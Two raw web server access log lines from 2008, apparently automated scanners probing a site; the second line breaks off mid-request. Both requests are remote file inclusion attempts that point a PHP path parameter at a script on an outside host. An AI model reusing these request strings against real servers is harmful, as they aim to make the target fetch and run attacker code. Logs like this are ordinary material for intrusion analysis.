200.21.223.90 - - [19/Feb/2008:09:32:32 -0800] "GET /logs//include.php?path[docroot]=http://www.cartographia.org/administrator/mic22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.115 - - [19/Feb/2008:09:33:08 -0800] "GET //components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://bobatka.info/modules/language/asc/asc/r7????%